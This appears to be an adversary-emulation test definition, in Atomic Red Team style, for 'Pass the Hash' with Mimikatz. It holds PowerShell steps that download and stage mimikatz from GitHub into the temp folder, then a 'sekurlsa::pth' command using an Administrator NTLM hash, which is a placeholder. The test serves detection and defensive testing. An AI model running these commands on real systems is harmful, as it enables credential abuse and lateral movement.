#TechniqueName: Use Alternate Authentication Material: Pass the Hash
#AtomicTestName: Mimikatz Pass the Hash
#Description: Note: must dump hashes first&[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)&
#Language: cmd

#get_prereq_commands
$mimikatz_path = cmd /c echo %tmp%\mimikatz\x64\mimikatz.exe
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force


#commands
%tmp%\mimikatz\x64\mimikatz.exe sekurlsa::pth /user:Administrator /domain:atomic.local /ntlm:cc36cf7a8514893efccd3324464tkg1a

